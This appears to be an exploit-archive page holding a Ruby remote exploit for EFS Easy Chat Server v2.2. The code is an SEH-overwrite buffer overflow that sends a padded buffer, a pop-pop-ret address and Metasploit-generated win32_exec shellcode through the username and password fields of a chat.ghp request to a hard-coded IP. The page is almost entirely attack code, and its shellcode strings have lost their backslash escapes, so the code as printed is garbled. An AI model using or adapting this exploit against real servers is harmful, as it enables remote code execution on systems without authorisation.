Exploit EFS Software Easy Chat Server v2.2

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Exploit EFS Software Easy Chat Server v2.2
# Published : 2010-01-18
# Author : John Babio
# Previous Title : Pidgin MSN <= 2.6.4 File Download Vulnerability
# Next Title : Internet Explorer Aurora Exploit

#!/usr/bin/ruby
# Author: John Babio
# Tested on: [Windows XP Sp3 Eng]

require 'net/http'
require 'uri'
require 'socket'


jmp = "xebx06x90x90"
ppr = "xa2xb91x10" #SSLEAY32.dll pop ebx, pop ebp, ret

#win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com

shellcode = "x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x86" +
"x49xaex6ax83xebxfcxe2xf4x7axa1xeax6ax86x49x25x2f" +
"xbaxc2xd2x6fxfex48x41xe1xc9x51x25x35xa6x48x45x23" +
"x0dx7dx25x6bx68x78x6exf3x2axcdx6ex1ex81x88x64x67" +
"x87x8bx45x9exbdx1dx8ax6exf3xacx25x35xa2x48x45x0c" +
"x0dx45xe5xe1xd9x55xafx81x0dx55x25x6bx6dxc0xf2x4e" +
"x82x8ax9fxaaxe2xc2xeex5ax03x89xd6x66x0dx09xa2xe1" +
"xf6x55x03xe1xeex41x45x63x0dxc9x1ex6ax86x49x25x02" +
"xbax16x9fx9cxe6x1fx27x92x05x89xd5x3axeexb9x24x6e" +
"xd9x21x36x94x0cx47xf9x95x61x2axcfx06xe5x49xaex6a" 

buffer = "x41" * 216 + jmp + ppr + shellcode

url = URI.parse('http://10.10.99.12')
res = Net::HTTP.start(url.host, url.port) {|http|
http.get('/chat.ghp?username=' +buffer+ '&password=' +buffer+ '&room=1&sex=2')
}
puts res.body